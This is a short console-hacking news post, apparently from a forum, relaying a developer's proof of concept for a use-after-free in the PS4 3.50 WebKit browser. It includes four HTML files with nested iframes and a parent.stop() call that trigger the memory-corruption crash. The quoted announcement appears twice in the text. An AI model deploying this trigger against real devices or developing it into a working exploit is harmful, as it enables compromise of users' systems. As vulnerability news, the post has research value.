Well that didn't take long since news of the PS4 Webkit Exploit for 3.50 broke, with PlayStation 4 developer Hunter128 stepping up to the plate with the heap use-after-free at WebCore 3.50 proof-of-concept!
Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.
Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.
Anywho make an index.html
1.html
2.html
3.html
Should cause a out of memory error.
Shoutout to no one.. I have no friends
Greetz to @Plankton in the PSXHAX Shoutbox today for the news!
Without further ado, here's what he had to say to quote: Hello. Appears this needs to be posted public.. Not sure who felt the need to want fame for this cough "Qwerty" but that's the last time i am sharing something special like this.
Anyone hoping for advancements for the PS Vita scene you can blame this guy on why because i am no longer sharing anything.
Anywho make an index.html
Code:
<html>
<body onload='runTest()'>
<script>
function runTest(){
document.writeln('<html></html>');
}
</script>
<iframe src='1.html'></iframe>
</body>
</html>
Code:
<html>
<iframe src='2.html'></iframe>
<iframe src='3.html'></iframe>
</html>
Code:
<html>
<script>
window.parent.stop();
</script>
</html>
Code:
<html>
</html>
Shoutout to no one.. I have no friends
Greetz to @Plankton in the PSXHAX Shoutbox today for the news!